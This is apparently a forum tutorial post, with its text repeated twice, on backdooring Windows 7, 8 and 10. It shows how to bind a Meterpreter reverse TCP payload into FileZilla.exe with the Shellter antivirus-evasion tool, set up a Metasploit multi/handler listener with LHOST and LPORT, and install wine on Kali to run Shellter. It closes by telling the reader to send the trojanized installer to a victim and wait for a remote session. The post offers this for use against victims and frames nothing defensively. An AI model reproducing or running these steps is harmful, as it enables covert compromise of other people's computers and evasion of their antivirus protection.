x32x01
ADMINISTRATOR
- by x32x01 ||
Exploit and Backdoor Windows: I’m back with another tutorial on Hacking Windows 7,8,10 Bypass Antivirus 100% FUD. I’m using shellter AV Evasion tool along with FileZilla.exe server to bind a payload with it.
Let’s get started!
This tutorial is for Windows, Mac, Linux.
Things you need to download!
1. Download Shellter.
2. Download FileZilla.exe
Exploit and Backdoor Windows 7,8,10 Bypass Antivirus FUD
After that.
Now you need to set LHOST and LPORT for that you need to find LHOST first by typing “ifconfig” in terminal that will show you your local IP Address and you don’t need to port forward for local attack if your planning for WAN exploit you probably need to port forward.
After that you need to create your payload using shellter. Let’s do it.
Download shellter and extract it on desktop.
to load shellter you need install wine32 on Kali Linux since Kali Linux don’t execute .exe files.
How to install wine on Kali Linux?
After that
Done! If you got any error let me know down below!
After installing wine now we have to open shellter.exe to do that,
After that it will ask you for Payload… You have to first copy FileZilla.exe to /root/Desktop/shellter/ because you’re going to bind payload inside FileZilla.exe (Watch the video)
After creating your payload from shellter you just need to send it to your victim and wait for the session …
Hope you like and enjoyed! more coming soon!
This tutorial is for Windows, Mac, Linux.
Things you need to download!
1. Download Shellter.
2. Download FileZilla.exe
- If your using Windows you need to install metasploit on windows.
- If your using MacOS you need to install metasploit on MacOS.
- If your using Kali Linux it’s already installed you just need to fire it up.
Exploit and Backdoor Windows 7,8,10 Bypass Antivirus FUD
Code:
msfconsole
After that.
Code:
use multi/handler
set payload windows/meterpreter/reverse_tcp
Now you need to set LHOST and LPORT for that you need to find LHOST first by typing “ifconfig” in terminal that will show you your local IP Address and you don’t need to port forward for local attack if your planning for WAN exploit you probably need to port forward.
Code:
set LHOST 192.168.1.3
set LPORT 1338
After that you need to create your payload using shellter. Let’s do it.
Download shellter and extract it on desktop.
Code:
cd /root/Desktop/shellter/
to load shellter you need install wine32 on Kali Linux since Kali Linux don’t execute .exe files.
How to install wine on Kali Linux?
Code:
echo deb http://http.kali.org/kali kali main non-free contrib > /etc/apt/sources.list
echo deb-src http://http.kali.org/kali kali main non-free contrib >> /etc/apt/sources.list
echo deb http://security.kali.org/kali-security kali/updates main contrib non-free >> /etc/apt/sources.list
echo deb-src http://security.kali.org/kali-security kali/updates main contrib non-free >> /etc/apt/sources.list
After that
Code:
sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine-bin:i386
Done! If you got any error let me know down below!
After installing wine now we have to open shellter.exe to do that,
Code:
wine shellter.exe
After that it will ask you for Payload… You have to first copy FileZilla.exe to /root/Desktop/shellter/ because you’re going to bind payload inside FileZilla.exe (Watch the video)
After creating your payload from shellter you just need to send it to your victim and wait for the session …
Hope you like and enjoyed! more coming soon!